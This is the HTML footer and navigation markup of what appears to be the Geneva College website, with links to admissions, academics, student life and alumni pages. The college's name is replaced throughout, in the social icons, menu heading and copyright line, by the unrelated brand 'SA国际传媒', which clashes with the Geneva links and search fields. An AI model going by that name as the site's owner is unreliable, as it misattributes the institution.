<div id="socialfooter">
<ul class="socialicons">
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Facebook (Opens in new tab)"> <i class="fa-brands fa-facebook-square"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on X (Opens in new tab)"> <i class="fa-brands fa-twitter"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Instagram (Opens in new tab)"> <i class="fa-brands fa-instagram"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on Youtube (Opens in new tab)"> <i class="fa-brands fa-youtube"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on LinkedIn (Opens in new tab)"> <i class="fa-brands fa-linkedin-in"></i> </a></li>
<li><a href="none" rel="noopener noreferrer" target="_blank" aria-label="SA国际传媒 on TikTok (Opens in new tab)"> <i class="fa-brands fa-tiktok">&nbsp;</i></a></li>
</ul>
</div>
<div class="pad20 buttonflex"><a class="quickbtn" href="/about-geneva/contact_us.php"><i class="fa fa-phone">&#160;</i>Contact Us</a><a class="quickbtn" href="/about-geneva/campus_map.php"><i class="fas fa-map-marker-alt"></i>&#160;Campus Map</a></div>
</div>
<!-- end footer left-->
<div class="eight columns" id="footerRight">
<div class="flex-foot">
<div class="footerGroup">
<div class="toggleHead hidToggle">General Information</div>
<ul class="hidFootLinks">
<li><a href="/about-geneva/foundationalconcepts.php">Foundational Concepts</a></li>
<li><a href="/about-geneva/nondiscrimination_policy.php">Nondiscrimination Policy</a></li>
<li><a href="/about-geneva/titleix/index.php">Title IX</a></li>
<li><a href="/employment/index.php">Employment</a></li>
<li><a href="/about-geneva/attribution.php">Attribution</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Offices &amp; Departments</div>
<ul class="hidFootLinks">
<li><a href="/academics/registrar/index.php">Registrar</a></li>
<li><a href="/student-accounts/index.php">Student Accounts</a></li>
<li><a href="/admissions/undergraduate.php">Admissions</a></li>
<li><a href="/academics/crossroads/index.php">Crossroads</a></li>
<li><a href="/academics/index.php">Academic Programs</a></li>
</ul>
</div>
<div class="footerGroup">
<div class="toggleHead hidToggle">Student Resources</div>
<ul class="hidFootLinks">
<li><a href="/library/index.php">McCartney Library</a></li>
<li><a href="/about-geneva/campus_bookstore.php">Campus Bookstore</a></li>
<li><a href="/about-geneva/policies/index.php">Academic Policies</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" src="/_files/sitegraphics/moodle-ico.png"/> Online Course Login</a></li>
<li><a href="none" rel="noopener" target="_blank"><img alt="" aria-hidden="true" height="16" src="/_files/sitegraphics/mygen-ico.png" style="display: inline-block; vertical-align: middle;" width="20"/> myGeneva Student Portal</a></li>
</ul>
</div>
<!--<div class="footerGroup">
<div class="toggleHead hidToggle">ALUMNI &amp; FRIENDS</div>
<ul class="hidFootLinks">
<li><a href="/alumni/index">Alumni Relations</a></li>
<li><a href="/alumni/online-services/class-notes/">Alumni Class Notes</a></li>
<li><a href="/alumni/events/index">Alumni Events</a></li>
<li><a href="/give/index">Give</a></li>
</ul>
</div>--> <a class="BackToTop" href="#topOfPageLink"><img alt="" aria-hidden="true" src="/_files/sitegraphics/to-top-sm.png"/></a></div>
<!-- end footerRight --></div>
<!-- end row --></div>
<!-- end footer container --></div>
<!-- end footer gradient --></div>
<div class="footer-end">
<div class="motto-margin">
<div class="pad20"><img alt="" aria-hidden="true" class="u-full-width" height="26" src="/_files/sitegraphics/motto-dark.svg" style="max-width: 250px;" width="250"/></div>
<div class="pad20">
<p class="copyright">&#169; SA国际传媒 | All rights reserved</p>
</div>
</div>
</div>


</div>      </div>
      <!--end .bg-blur wrap-->
        <!-- Offcanvas Menu Include Here-->
      <div>

	
	<!-- RESPONSIVE MENU ============================================== -->
	<nav id="menu">
		<ul>
			<div id="searchBox-menu" class="roundcorners">
				<form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng">
					<div id="searchFld-menu">
						<input class="searchTxt-menu" id="fldsearch" name="q" style="background-color: transparent;" tabindex="1" type="text" placeholder="Search Geneva" />
						<input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" />
						<input name="cof" type="hidden" value="FORID:11" />
						<input name="sa" type="hidden" value="Search" />
						<!-- <input class="searchButton-menu" name="input" src="https://www.geneva.edu/_files/sitegraphics/searchico32.png" type="image" value="Search Geneva" /> -->
						<button class="searchButton" style="cursor: pointer; background: none; overflow: hidden;">
							<i class="fa-xl fa-solid fa-magnifying-glass searchButton" style="color: #aa8228; text-align: center; margin-top: 50%;"></i>
						</button>
					</div>
				<input type="hidden" name="as_sfid" value="AAAAAAXex118qTPPpAH-POwwp4cetVzuaG-eWdtFP2lFflypwzsZm40aIC6Bx3N5hxpxtPnKf05uXA_oZsAKvLoG3yHUgbhzE77sQJ6bXObXftbE5M4yr5vQk0BEXCrYGTrTf-Q=" /><input type="hidden" name="as_fid" value="3989a7d8165bb9111df5e8046e3e103f285eae70" /></form>
			</div>
			<!-- end searchBox-menu-->
			<li>
				<span>SA国际传媒</span>
				<ul>
					<li>
						<a href="/about-geneva/">Fast Facts &amp; Overview</a>
					</li>
					<li>
						<a href="/about-geneva/identity/">Geneva Identity</a>
					</li>
					<li>
						<a href="/about-geneva/policies/">Academic Policies</a>
					</li>
					<li>
						<a href="/about-geneva/leadership">Leadership</a>
					</li>
					<li>
						<a href="/articles/">Stories, Blogs &amp; Articles</a>
					</li>
					<li>
						<a href="/calendar/">Calendar of Events</a>
					</li>
				</ul>
			</li>
			<li>
				<span>Academics</span>
				<ul>
					<li><a href="/academics/">Explore Academics</a></li>
                    <li><a href="/academics/programs/">Search Degree Programs</a></li>
                    <li><a href="/academics/core">Core Curriculum</a></li>
                    <li><a href="/academics/honors/">Honors Program</a></li>
                    <li><a href="/graduate/">Graduate Programs</a></li>
                    <li><a href="/online-degree/">Online Degree Programs</a></li>
                    <li><a href="/pittsburgh/">Geneva Pittsburgh Campus</a></li>
                    <li><a href="/faculty-staff/faculty/">Our Faculty</a></li>
                    <li><a href="/cfl/">Center for Faith &amp; Life</a></li>
				</ul>
			</li>
			<li>
				<a aria-haspopup="true">
					<span>Admissions &amp; Aid</span>
				</a>
				<ul>
				    <li><a href="/financial-aid/tug-financial-aid">Undergraduate</a></li>
                    <li><a href="/graduate/admissions/">Graduate</a></li>
                    <li><a href="/online-degree/admissions/">Online Degree Programs</a></li>
                    <li><a href="/admissions/visit/">Visit Geneva</a></li>
                    <li><a href="/admissions/international/">International Students</a></li>
                    <li><a href="/admissions/transfers/">Transfer Students</a></li>
                    <li><a href="/academics/crossroads/earlycollege/">Early College</a></li>
                    <li><a href="/admissions/military/">Military &amp; Veterans</a></li>
				</ul>
			</li>
			<li>
				<span>Student Life</span>
				<ul>
				<li>
						<a href="/student-life/">Student Life Home</a>
					</li>
					<li><a href="/student-life/engagement/">Activities &amp; Engagement</a></li>
                    <li><a href="/calling-career/">Calling &amp; Career</a></li>
                    <li><a href="/student-life/residence-life/">Residence Life &amp; Housing</a></li>
                    <li><a href="/student-life/wellness/">Health &amp; Wellness</a></li>
                    <li><a href="/student-life/spiritual-life/">Spiritual Life</a></li>
                    <li><a href="/student-life/campus-safety/">Campus Safety</a></li>
                    <li><a href="/student-life/academic-support/">Academic Support</a></li>
                    <li><a href="/student-life/commuters">Commuter Life</a></li>
                    <li><a href="/student-life/student-resources">Student Resources</a></li>
				</ul>
			</li>
			<li>
				<span>Alumni</span>
				<ul>
					<li>
						<a href="none">Giving</a>
					</li>
					<li>
						<a href="/alumni/">Alumni Home</a>
					</li>
					<li>
						<a href="/alumni/events/">Alumni Events</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni-update-form">Alumni Update Form</a>
					</li>
					<li>
						<a href="/academics/registrar/student_records_transcripts">Transcript Requests</a>
					</li>
					<li>
						<a href="/alumni/represent/alumni_referrals">Gold and White Referrals</a>
					</li>
					<li>
						<a href="/alumni/represent/legacylink">Legacy Link Program</a>
					</li>
					<li>
						<a href="/alumni/connect/alumni_contact">Contact Alumni Engagement</a>
					</li>
					<!--<li>
						<a href="/homecoming/">Homecoming 2025</a>
					</li>-->
				</ul>
			</li>
			<li>
				<a href="none">
					<span>Athletics</span>
				</li>
			</li>
			<div class="mmenu-undernav">&copy; SA国际传媒 | 
				<a href="/about-geneva/contact_us">Contact Us</a>
			</div>
			<div class="searchBox-panel2"></div>
		</ul></nav>
<!-- Hidden Modal Search --> 
<!--<a href="#modalsearch">Search Geneva.edu</a>-->
<div id="search-box"><a class="close" href="#close"></a>
<div class="container">
<div class="search-main">
<div class="search-inner"><form action="/search.php" class="formFix" id="searchbox_006510535078434149773:n0dixopbnng"><input id="inputSearch" name="q" placeholder="Search Geneva.edu" type="text" /> <input name="cx" type="hidden" value="006510535078434149773:n0dixopbnng" /> <input name="cof" type="hidden" value="FORID:11" /> <button class="search-glass" style="cursor: pointer; background: none; overflow: hidden;"> <i aria-hidden="true" class="fa-xl fa-solid fa-magnifying-glass" style="color: #c99a2c;"></i> </button><input type="hidden" name="as_sfid" value="AAAAAAWBQDB1879Q0jdZJ0lZaHVDsSMkt4TmhhYRSxuHfjfdN-8PdPoDdTm04O0pUXZMkIrTjU5KWKWTOUaBMbS0Q-1-B0hBxsME0yx8sD8RiHCGldMC3054Gw7RM4UijHpaofc=" /><input type="hidden" name="as_fid" value="d51f49d203618208156c681da1c40ec00f65cee5" /></form><span class="search-info">Hit enter to search or ESC to close</span></div>
</div>
</div>
</div>
<!-- end Hidden Modal Search -->

	


</div>       
      
      <!-- include External Jquery last -->
      
        <!-- Final JS files Include Here-->
      <div>

	

<script src="none" type="text/javascript"></script>
<!-- ADDITIONAL STYLES AND SCRIPTS ========================== -->
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>
<script src="none" type="text/javascript"></script>




</div>      
   </body>
</html>